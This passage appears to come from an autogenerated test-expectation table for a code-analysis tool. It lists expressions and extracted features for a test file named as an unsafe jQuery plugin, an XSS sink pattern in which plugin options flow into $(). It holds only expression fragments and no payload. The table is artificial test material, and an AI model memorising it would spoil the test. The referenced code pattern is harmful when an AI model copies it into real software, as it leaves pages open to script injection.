autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | exceptional return of $(options.target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | exceptional return of $(options.target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | exceptional return of $(options.target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:4:8:20 | exceptional return of $(options.target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:12 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:12 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:12 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:12 | options | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:19 | options.target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:19 | options.target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:19 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:19 | options.target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:19 | options.target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:6:8:19 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:14:8:19 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:14:8:19 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:14:8:19 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:8:14:8:19 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:12 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:12 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:12 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:12 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target ... .target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target ... .target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target ... .target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:7:11:29 | target ... .target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:22 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:22 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:22 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:22 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:29 | options.target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:29 | options.target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:29 | options.target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:16:11:29 | options.target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:24:11:29 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:24:11:29 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:24:11:29 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:11:24:11:29 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:15 | isElement | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:15 | isElement | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:15 | isElement | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:15 | isElement | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | exceptional return of isElement(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | exceptional return of isElement(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | exceptional return of isElement(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | exceptional return of isElement(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | isElement(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | isElement(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | isElement(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:13:7:13:23 | isElement(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:4:14:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:6:14:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:6:14:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:6:14:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:6:14:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:6:14:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:14:6:14:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:19 | typeof target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:19 | typeof target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:19 | typeof target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:19 | typeof target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | typeof ... string" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | typeof ... string" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | typeof ... string" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:7:17:31 | typeof ... string" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:14:17:19 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:14:17:19 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:14:17:19 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:14:17:19 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:24:17:31 | "string" | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:24:17:31 | "string" | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:24:17:31 | "string" | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:17:24:17:31 | "string" | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:4:18:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:6:18:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:6:18:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:6:18:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:6:18:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:6:18:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:18:6:18:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:3:21:3 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:3:21:3 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:3:21:3 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:3:21:3 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:12 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:12 | target | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:12 | target | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:12 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:19 | target.jquery | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:19 | target.jquery | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:19 | target.jquery | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:19 | target.jquery | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:21:7:21:33 | target. ... defined | contextFunctionInterfaces 